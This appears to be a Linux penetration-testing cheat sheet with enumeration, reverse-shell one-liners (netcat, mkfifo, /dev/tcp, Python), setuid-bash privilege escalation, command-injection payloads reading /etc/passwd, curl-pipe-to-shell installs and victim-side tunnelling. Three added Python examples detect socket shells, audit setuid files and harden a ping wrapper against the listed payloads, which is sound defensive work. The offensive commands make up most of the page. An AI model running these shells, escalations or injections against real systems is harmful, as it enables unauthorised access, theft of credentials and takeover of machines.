
# Linux

![](https://user-images.githubusercontent.com/28403617/172728126-5dc238f3-9491-415b-a5f6-bedbb62d01cd.svg#gh-light-mode-only)

***

* [Command Injection](#command-injection)
* [Enumeration](#enumeration)
* [FTP](#ftp)
* [Gdbserver](#gdbserver)
* [Network](#network)
* [Port Forwarding](#port-forwarding)
* [Privilege Escalation](#privilege-escalation)
* [Reverse Shell](#reverse-shell)
* [SCP](#scp)
* [Sudo](#sudo)

## Sudo

```bash
sudo -l
```

## Enumeration

### Script

#### LinPeas

```bash
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

#### Linux Smart Enumeration

```bash
curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1
```

#### Metasploit

```bash
msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit'
```

#### Docker

```bash
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O
```

### File

#### Classic

* `/etc/passwd` & `/etc/shadow`
* `/www/html` ꞏ `/var/www` ꞏ `/srv/html` ꞏ `/usr/share/*`
* `/home/user/.ssh`
* `/etc/cron.d`
* `/opt/`
* `/usr/local/bin`
* `/etc/nginx/sites-available/default`
* `/etc/apache2/sites-enabled/000-default.conf`

#### Proc

`/proc/` contains useful information about the processes that are currently running. Replace `PID` with a process id, or use `/proc/self/` for the current process.

| directory           | description                                     |
| ------------------- | ----------------------------------------------- |
| `/proc/PID/cmdline` | Command line arguments.                         |
| `/proc/PID/cwd`     | Link to the current working directory.          |
| `/proc/PID/environ` | Values of environment variables.                |
| `/proc/PID/exe`     | Link to the executable of this process.         |
| `/proc/PID/fd`      | Directory, which contains all file descriptors. |

#### Command

```bash
find / -user user 2>&-
find / -group group 2>&-
find / -user root -executable -type f 2>&- | grep -v /bin/
```

```bash
# List files carrying file capabilities, system-wide (permission errors silenced)
/sbin/getcap -r / 2>/dev/null
```

## Reverse Shell

#### Server

```bash
nc -lp 4444
```

#### reSH

```bash
# Client
resh ip 4444
# Server
resh 4444
```

[Source](https://github.com/sawyerf/HackSheet/blob/main/scripts/resh.py)

#### Netcat

```bash
nc ip 4444 -e /bin/bash
```

#### Mkfifo

```bash
mkfifo /tmp/f;nc ip 4444 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f
```

#### Dev

```bash
bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'
```

#### Python

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

#### TTY Support

```bash
bash -i
```

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

```bash
script -qc /bin/bash /dev/null
```

#### rlwrap

> rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. For when you cannot spawn a proper TTY [*source*](https://github.com/hanslub42/rlwrap)

```bash
rlwrap command
```

```bash
# Receiving connection from a reverse shell
rlwrap nc -lnvp port

# Connecting to the victim
rlwrap nc ip port

# Give the shell history and tab completion: -r puts all words seen on in- and output
# on the completion list, -f . adds completion words from the current directory (see rlwrap -h).
# The options belong to rlwrap, so they go before the nc command.
rlwrap -r -f . nc ip port
```

[*source*](https://github.com/acole76/pentestmonkey-cheatsheets/blob/master/shells.md)
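As an added example for the Proc table and the Reverse Shell section (this is not HackSheet's code), the following script applies the `/proc/PID/cmdline` and `/proc/PID/fd` entries from the table to detect the shells those one-liners leave behind: `nc -e`, the `/dev/tcp` redirection and the Python `dup2` variant all end up as an `sh`/`bash` whose descriptors 0, 1 and 2 link to `socket:[inode]`. The shell names and the sample process data are assumptions constructed for the example; the `mkfifo` variant is deliberately included as a miss, because there the shell talks to pipes and the socket is held by the sibling `nc` process.

```python
import os
import re

# Added example, not part of HackSheet. Shell names are an assumption; extend as needed.
SHELL_NAMES = {"sh", "bash", "dash", "ash", "zsh", "ksh"}
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


def is_shell(cmdline: bytes) -> bool:
    """True if argv[0] from /proc/PID/cmdline (NUL separated) names a shell."""
    argv0 = cmdline.split(b"\0", 1)[0].decode("utf-8", "replace")
    # login shells show up as "-bash"
    return os.path.basename(argv0).lstrip("-") in SHELL_NAMES


def socket_stdio(fd_links: dict) -> list:
    """Return the stdio descriptors (0, 1, 2) whose /proc/PID/fd link is a socket."""
    return [fd for fd in (0, 1, 2) if SOCKET_LINK.match(fd_links.get(fd, ""))]


def is_socket_shell(cmdline: bytes, fd_links: dict) -> bool:
    """A shell with any of stdin/stdout/stderr on a socket is almost never a normal login."""
    return is_shell(cmdline) and bool(socket_stdio(fd_links))


def scan_proc(proc_root: str = "/proc") -> list:
    """Walk the live /proc tree; return (pid, argv0, socket fds) per hit.
    readlink on /proc/PID/fd/* needs permission, so other users' processes are
    skipped silently when running unprivileged (run as root for a full picture)."""
    hits = []
    try:
        pids = [p for p in os.listdir(proc_root) if p.isdigit()]
    except OSError:
        return hits
    for pid in pids:
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = f.read()
        except OSError:
            continue
        fd_links = {}
        for fd in (0, 1, 2):
            try:
                fd_links[fd] = os.readlink(os.path.join(base, "fd", str(fd)))
            except OSError:
                pass
        if is_socket_shell(cmdline, fd_links):
            argv0 = cmdline.split(b"\0", 1)[0].decode("utf-8", "replace")
            hits.append((int(pid), argv0, socket_stdio(fd_links)))
    return hits


# Constructed samples: what cmdline and readlink(/proc/PID/fd/N) return for the
# reverse-shell variants above and for two benign processes.
SAMPLES = {
    # "nc ip 4444 -e /bin/bash" or the python dup2 one-liner: shell inherits the socket on 0, 1, 2
    4242: (b"/bin/bash\0", {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]"}),
    # "bash -i >& /dev/tcp/ip/4444 0>&1": same picture
    4243: (b"bash\0-i\0", {0: "socket:[31338]", 1: "socket:[31338]", 2: "socket:[31338]"}),
    # mkfifo variant: sh talks to pipes, the socket belongs to the sibling nc process (missed here)
    4244: (b"/bin/sh\0-i\0", {0: "pipe:[5000]", 1: "pipe:[5001]", 2: "pipe:[5001]"}),
    4245: (b"nc\0ip\x004444\0", {0: "/tmp/f", 1: "pipe:[5000]", 2: "/dev/pts/0"}),
    # interactive login shell on a pty: benign
    4246: (b"-bash\0", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
}

if __name__ == "__main__":
    for pid, (cmdline, fds) in SAMPLES.items():
        print(pid, "socket shell" if is_socket_shell(cmdline, fds) else "ok")
    for hit in scan_proc():
        print("live hit:", hit)
```

To cover the `mkfifo` case as well, extend the check to any `nc`/`ncat`/`socat` process whose stdio links to a FIFO or pipe and which has a shell as a sibling under the same parent; the `/proc/PID/status` `PPid:` field gives the parent.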

## Privilege Escalation

```bash
/bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up
/tmp/bash_up -p
```

```bash
chmod 4755 /bin/bash
bash -p
```
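Both snippets above leave a setuid/setgid file on disk, either a renamed copy of `bash` outside the system directories or `/bin/bash` itself with mode `4755`. The following audit script is an added example (not HackSheet's code) that finds such files with `os.lstat` and rates them: a shell carrying the bits is `critical`, a setid file outside the baseline directories is `high`, and everything else is `review` so it can be diffed against a known-good list. The baseline directories and shell names are assumptions; a real audit compares against the package manager's file lists (for example `debsums` or `rpm -V`) rather than against paths.

```python
import os
import stat

# Added example, not from HackSheet. Baseline directories and shell names are assumptions.
EXPECTED_DIRS = ("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/lib", "/usr/libexec")
SHELL_NAMES = {"sh", "bash", "dash", "ash", "zsh", "ksh"}
SKIP_ROOTS = ("/proc", "/sys", "/dev", "/run")


def setid_bits(mode: int) -> str:
    """'u', 'g', 'ug' or '' depending on which of setuid/setgid are set in st_mode."""
    return ("u" if mode & stat.S_ISUID else "") + ("g" if mode & stat.S_ISGID else "")


def rate(path: str, mode: int, uid: int):
    """Rate a setuid/setgid regular file; None if it carries neither bit or is not a regular file.

    critical: a shell with setuid/setgid (the "chmod 4755 /bin/bash" case above)
    high:     setuid/setgid outside the baseline directories (the /tmp/bash_up case above,
              caught by location, so a renamed copy is still found)
    review:   anything else, e.g. /usr/bin/passwd, to diff against a known baseline
    """
    bits = setid_bits(mode)
    if not bits or not stat.S_ISREG(mode):
        return None
    if os.path.basename(path) in SHELL_NAMES:
        return "critical"
    in_baseline = any(path.startswith(d + "/") for d in EXPECTED_DIRS)
    if not in_baseline:
        return "high"
    return "review"


def find_setid(root: str = "/") -> list:
    """Walk root and return sorted (rating, path, mode, uid) for setuid/setgid regular files.
    Pseudo filesystems are pruned; symlinks are not followed (os.walk default, lstat)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath in SKIP_ROOTS:
            dirnames[:] = []
            continue
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            rating = rate(path, st.st_mode, st.st_uid)
            if rating:
                hits.append((rating, path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return sorted(hits)


if __name__ == "__main__":
    # Run as root for a complete listing; unreadable directories are skipped otherwise.
    for rating, path, mode, uid in find_setid("/"):
        print(f"{rating:8} {mode:>6} uid={uid:<6} {path}")
```

The ratings are a starting point for triage, not a verdict: a `review` entry is only safe if it matches the distribution's package contents, and a `high` entry in `/opt` may be a legitimately installed vendor binary.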

## FTP

> *Port: 21*
>
> File transfer protocol (FTP) is an Internet tool provided by TCP/IP. It helps to transfer files from one computer to another by providing access to directories or folders on remote computers

#### Scan

```bash
nmap --script ftp-* -p 21 ip
```

#### Download all files

```bash
wget -m --user=user --password=password ftp://ip
```

```bash
wget -m --user=anonymous --password=anonymous ftp://ip
```

## Gdbserver

> *Port: 1337*
>
> Gdbserver is a computer program that makes it possible to remotely debug other programs. You need to have a copy of the program you want to debug put onto the target system.

```
$ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file
```

## Command Injection

```bash
;{cat,/etc/passwd}
;cat${IFS}/etc/passwd;
; cat /etc/passwd ;
$(cat /etc/passwd)
`cat /etc/passwd`
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <(cat /etc/passwd)
| cat /etc/passwd
"; cat /etc/passwd "
```

[GTFOBins - Bypass local security restrictions](https://gtfobins.github.io/)
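Every payload in the list above works for the same reason: user input is concatenated into a command line that a shell parses, so `;`, `$()`, backticks, `&&`, `||`, `|` and process substitution become command separators. The following added example (not HackSheet's code) shows the vulnerable pattern next to its hardened form for a `ping` wrapper: no shell, one argument per token, and an allow-list check on the host value. The hostname rule is an assumption (it does not cover IPv6 or internationalised names); the payload list is the one from this page.

```python
import re
import subprocess

# Added example, not from HackSheet. Allow-list for a hostname or IPv4 literal (assumption):
# letters, digits, dots and dashes only, and no leading dash so the value cannot become an option.
HOST_RE = re.compile(r"^(?!-)[A-Za-z0-9.-]{1,253}$")

# The command-injection payloads listed on this page.
PAYLOADS = [
    ";{cat,/etc/passwd}",
    ";cat${IFS}/etc/passwd;",
    "; cat /etc/passwd ;",
    "$(cat /etc/passwd)",
    "`cat /etc/passwd`",
    "&& cat /etc/passwd &&",
    "|| cat /etc/passwd ||",
    "< <(cat /etc/passwd)",
    "| cat /etc/passwd",
    '"; cat /etc/passwd "',
]


def vulnerable_ping_cmd(host: str) -> str:
    """The string the vulnerable code hands to shell=True: input is spliced into the
    command line, so every separator in PAYLOADS is interpreted by the shell."""
    return "ping -c 1 " + host


def ping_vulnerable(host: str) -> int:
    """Vulnerable form, kept for contrast only: shell=True plus string concatenation."""
    return subprocess.run(vulnerable_ping_cmd(host), shell=True).returncode


def is_valid_host(host: str) -> bool:
    """Allow-list check; anything outside [A-Za-z0-9.-] or starting with '-' is rejected."""
    return bool(HOST_RE.match(host))


def validate_host(host: str) -> str:
    if not is_valid_host(host):
        raise ValueError("rejected host value: %r" % host)
    return host


def safe_ping_argv(host: str) -> list:
    """argv for the hardened call: validated input, one argument per token, no shell."""
    return ["ping", "-c", "1", validate_host(host)]


def ping_hardened(host: str) -> int:
    """Run ping without a shell; metacharacters in host are never interpreted, and
    validate_host() rejects them before anything is executed."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, timeout=10).returncode


def rejected_payloads() -> list:
    """Which of the page's payloads the validator rejects (expected: all of them)."""
    return [p for p in PAYLOADS if not is_valid_host(p)]


if __name__ == "__main__":
    print("shell would see:", vulnerable_ping_cmd(PAYLOADS[0]))
    print("hardened argv:  ", safe_ping_argv("example.com"))
    print(len(rejected_payloads()), "of", len(PAYLOADS), "payloads rejected")
```

The argv form alone already defeats the separators, because no shell ever parses the value; the allow-list is the second layer that also stops option smuggling (`-c 1000000`) and keeps the value within what the program is meant to receive.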

## Network

#### Netstat

```bash
netstat -tulpn
```

#### Scan Port

```bash
for port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2>/dev/null
```

#### Scan Ip

```bash
for i in {1..254}; do (ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
```

## Port Forwarding

#### Chisel

```bash
# Install chisel
curl https://i.jpillora.com/chisel! | bash
```

```bash
# Example: make the victim's 127.0.0.1:8000 reachable on the attacker machine as port 8000
# (the chisel control channel itself runs over port 4444)

# Attacker machine:
chisel server -p 4444 --reverse

# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000
```

#### SSH

```sh
ssh -L 8080:127.0.0.1:8080 user@ip
```

## SCP

#### Download File

```
scp -P port user@192.168.1.ip:path .
```

#### Upload File

```
scp -P port file user@192.168.1.ip:path
```

#### Upload peda

```
scp -P 22 -r ~/.peda user@192.168.1.ip:/tmp/peda
```
